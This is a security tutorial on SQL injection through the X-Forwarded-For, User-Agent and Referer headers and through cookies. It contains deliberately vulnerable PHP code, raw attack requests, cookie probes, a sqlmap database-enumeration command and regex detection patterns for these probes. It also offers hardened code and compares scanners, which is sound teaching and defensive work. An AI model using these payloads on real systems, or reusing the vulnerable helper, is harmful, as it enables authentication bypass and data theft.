Beyond GET/POST: Testing HTTP Headers and Cookies for SQL Injection
This article examines how web vulnerability scanners handle non‑traditional input vectors such as HTTP headers and cookies, demonstrates manual exploitation techniques for header‑based SQL injection, compares scanner coverage and accuracy, and offers practical guidance for developers and penetration testers.
Why HTTP Headers and Cookies Matter
During vulnerability assessment and penetration testing, identifying all possible input vectors is the first step. While most tools focus on GET and POST parameters, HTTP headers and cookies can also carry user‑controlled data that may be vulnerable to SQL injection.
Scanner Coverage of Input Vectors
A comparison of 60 commercial and open‑source black‑box web scanners (originally published as “Scanning Legion: Accuracy Evaluation & Feature Comparison”) shows that 75% of scanners fail to test HTTP header parameters, and about 70% mishandle cookie parameters. GET and POST support is generally adequate, but many tools produce unsatisfactory results when headers are used as injection vectors.
Potential SQL Injection via HTTP Headers
X‑Forwarded‑For
The X-Forwarded-For header often contains the client IP address. If the application stores this value without proper sanitisation, an attacker can inject arbitrary SQL code.
$req = mysql_query("SELECT user,password FROM admins WHERE user='".sanitize($_POST['user'])."' AND password='".md5($_POST['password'])."' AND ip_adr='".ip_adr()."'");

The helper functions used are:

function sanitize($param) {
    if (is_numeric($param)) {
        return $param;
    } else {
        return mysql_real_escape_string($param);
    }
}

function ip_adr() {
    if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        $ip_adr = $_SERVER['HTTP_X_FORWARDED_FOR'];
    } else {
        $ip_adr = $_SERVER["REMOTE_ADDR"];
    }
    // The pattern is anchored only at the start, so anything following a
    // valid-looking IPv4 prefix passes through, and the returned value is
    // concatenated into the query without going through sanitize().
    if (preg_match("#^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}#", $ip_adr)) {
        return $ip_adr;
    } else {
        return $_SERVER["REMOTE_ADDR"];
    }
}

By sending a crafted request such as:
GET /index.php HTTP/1.1
Host: victim.com
X-Forwarded-For: 127.0.0.1' or 1=1#

the attacker can bypass authentication.
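The following is an added example, not code from the original article: a hardened replacement for the ip_adr() helper and the admin lookup above. It assumes PDO with the MySQL driver, an admins(user, password, ip_adr) table whose password column holds password_hash() output rather than the md5() of the original query, and a placeholder proxy address.

```php
<?php
// Added example, not code from the original article: a hardened replacement for
// the ip_adr() helper and the admin lookup above. Assumes PDO with the MySQL
// driver and an admins(user, password, ip_adr) table where password holds
// password_hash() output instead of the md5() shown in the original query.

// Constructed placeholder: the reverse proxy we operate. X-Forwarded-For is only
// believed when the TCP peer is that proxy; anyone else can set the header freely.
const TRUSTED_PROXIES = ['10.0.0.5'];

function client_ip(array $server): string
{
    $remote = $server['REMOTE_ADDR'] ?? '';
    if (in_array($remote, TRUSTED_PROXIES, true) && isset($server['HTTP_X_FORWARDED_FOR'])) {
        // The header is a comma-separated chain; the rightmost entry is the one
        // our proxy appended, earlier entries are whatever the client sent.
        $parts = array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR']));
        $candidate = end($parts);
        // filter_var only accepts a complete IPv4/IPv6 literal. The original regex
        // was anchored at the start only, so "127.0.0.1' or 1=1#" matched its prefix.
        if (filter_var($candidate, FILTER_VALIDATE_IP) !== false) {
            return $candidate;
        }
    }
    return $remote;
}

function find_admin(PDO $pdo, string $user, string $password, string $ip): ?string
{
    // Bound parameters keep every value, the IP included, as data: a quote inside
    // the value can no longer close the string literal and append SQL.
    $stmt = $pdo->prepare(
        'SELECT user, password FROM admins WHERE user = :user AND ip_adr = :ip'
    );
    $stmt->execute([':user' => $user, ':ip' => $ip]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($password, $row['password'])) {
        return null;
    }
    return $row['user'];
}

// Constructed request: the article's payload arrives through our proxy.
$server = ['REMOTE_ADDR' => '10.0.0.5', 'HTTP_X_FORWARDED_FOR' => "127.0.0.1' or 1=1#"];
$ip = client_ip($server); // the forged header fails validation, so REMOTE_ADDR is used
// $admin = find_admin($pdo, $_POST['user'], $_POST['password'], $ip); // $pdo: your connection
```

Validation alone would not be enough here: even a value that passes filter_var should still reach the query only through a bound parameter.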
User‑Agent
The User-Agent header may be stored by some applications (e.g., for shopping‑cart tracking). An injection example:
GET /index.php HTTP/1.1
Host: victim.com
User-Agent: aaa' or 1/*

Referer
If the Referer header is written to a database without filtering, it can also be a source of SQL injection:
GET /index.php HTTP/1.1
Host: victim.com
User-Agent: aaa' or 1/*
Referer: http://malicious.example

Manual Testing of Cookie Vulnerabilities
Browser extensions such as Cookie Manager+ allow inspection, editing, and creation of cookies. By modifying a cookie value (e.g., appending a single quote) and sending the request, a SQL error can be observed, confirming the vulnerability.
Another useful tool is Tamper Data, which intercepts and modifies HTTP requests, including headers and cookies. By appending order by 4 to a cookie value and observing the server response, the number of columns in the underlying query can be inferred.
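As an added example (not from the original article), the defender's side of the two sections above: a small PHP scanner that flags the header and cookie probes they describe in web server logs. The log lines are constructed, and the field order assumes a custom Apache LogFormat (a placeholder, not from the article) that writes the request line, X-Forwarded-For, Cookie, Referer and User-Agent as quoted fields.

```php
<?php
// Added example, not code from the original article: flags the header and cookie
// probes described above in web server logs. The log lines are constructed and
// assume an Apache LogFormat (placeholder, not from the article) that writes the
// request line, X-Forwarded-For, Cookie, Referer and User-Agent as quoted fields.

const PROBE_PATTERNS = [
    'quote-then-boolean' => '/\'\s*(?:or|and)\b/i',   // 127.0.0.1' or 1=1#
    'order-by-probe'     => '/\border\s+by\s+\d+/i',  // order by 4 placed in a cookie
    'comment-terminator' => '/(?:#|\/\*|--)\s*$/',    // value ends in a MySQL comment
    'dangling-quote'     => '/\'\s*$/',               // the single quote appended by hand
];

const FIELD_NAMES = ['request', 'x-forwarded-for', 'cookie', 'referer', 'user-agent'];

function quoted_fields(string $line): array
{
    // Extract each "..." field; Apache escapes embedded double quotes as \".
    preg_match_all('/"((?:[^"\\\\]|\\\\.)*)"/', $line, $m);
    return array_map('stripslashes', $m[1]);
}

function scan_log_line(string $line): array
{
    $hits = [];
    foreach (quoted_fields($line) as $i => $value) {
        $field = FIELD_NAMES[$i] ?? "field$i";
        foreach (PROBE_PATTERNS as $label => $re) {
            if (preg_match($re, $value) === 1) {
                $hits[] = "$field: $label";
            }
        }
    }
    return $hits;
}

// Constructed log lines: one per vector from the article, plus a benign request
// with an apostrophe in the Referer to show that it is not flagged.
$lines = [
    '203.0.113.7 "GET /index.php HTTP/1.1" "127.0.0.1\' or 1=1#" "PHPSESSID=abc" "-" "Mozilla/5.0" 200',
    '203.0.113.7 "GET /index.php HTTP/1.1" "-" "PHPSESSID=abc\' order by 4#" "-" "Mozilla/5.0" 200',
    '203.0.113.7 "GET /index.php HTTP/1.1" "-" "PHPSESSID=abc" "http://malicious.example" "aaa\' or 1/*" 200',
    '198.51.100.2 "GET /index.php HTTP/1.1" "-" "PHPSESSID=def" "https://example.com/o\'reilly" "Mozilla/5.0" 200',
];
foreach ($lines as $line) {
    $hits = scan_log_line($line);
    echo ($hits ? implode(', ', $hits) : 'clean') . "\n";
}
```

The patterns are deliberately narrow so that ordinary apostrophes in Referer or User-Agent values do not trigger them; a single match is a reason to look at the request, not proof of exploitation.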
Automated Testing with sqlmap
sqlmap is a popular open-source tool that can test and exploit SQL injection flaws, including those in cookies and headers. By default it tests GET and POST parameters; --level 2 adds cookie testing, and --level 3 adds the User-Agent and Referer headers. Specific parameters can be forced with the -p option.
./sqlmap.py -u 'http://127.0.0.1/vulnerabilities/sqli/?id=1&Submit=Submit#' \
--cookie='PHPSESSID=0e4jfbrgd8190ig3uba7rvsip1; security=low' \
--string='First name' --dbs --level 3 -p PHPSESSID

Scoring Methodology and Scanner Rankings
To balance detection accuracy and input‑vector coverage, each scanner receives a score that is the average of its detection rate and the percentage of supported vectors (GET, POST, Cookie, Headers). The top 14 scanners by this metric are:
Arachni – 100 % detection, 100 % coverage (average 100 %).
sqlmap – 97.06 % detection, 100 % coverage (average 98.53 %).
IBM AppScan – 93.38 % detection, 100 % coverage (average 96.69 %).
Acunetix WVS – 89.71 % detection, 100 % coverage (average 94.85 %).
NTOSpider – 85.29 % detection, 100 % coverage (average 92.64 %).
Nessus – 82.35 % detection, 100 % coverage (average 91.17 %).
WebInspect – 75.74 % detection, 100 % coverage (average 87.87 %).
Burp Suite Pro – 72.06 % detection, 100 % coverage (average 86.03 %).
Cenzic Pro – 63.24 % detection, 100 % coverage (average 81.62 %).
SkipFish – 50.74 % detection, 100 % coverage (average 75.37 %).
Wapiti – 100 % detection, 50 % coverage (average 75 %).
Netsparker – 98 % detection, 50 % coverage (average 74 %).
Paros Pro – 93.38 % detection, 50 % coverage (average 71.69 %).
ZAP – 77.21 % detection, 50 % coverage (average 63.60 %).
Recommendations
For Developers
Treat cookies and any other client‑controlled data (including custom headers) with the same validation and sanitisation rigor applied to standard form inputs.
For Testers
Include HTTP header manipulation, especially Referer and User-Agent, in your testing checklist. Define clear test cases for each vector, as these headers are often stored or reflected by applications and can lead to SQL injection or XSS.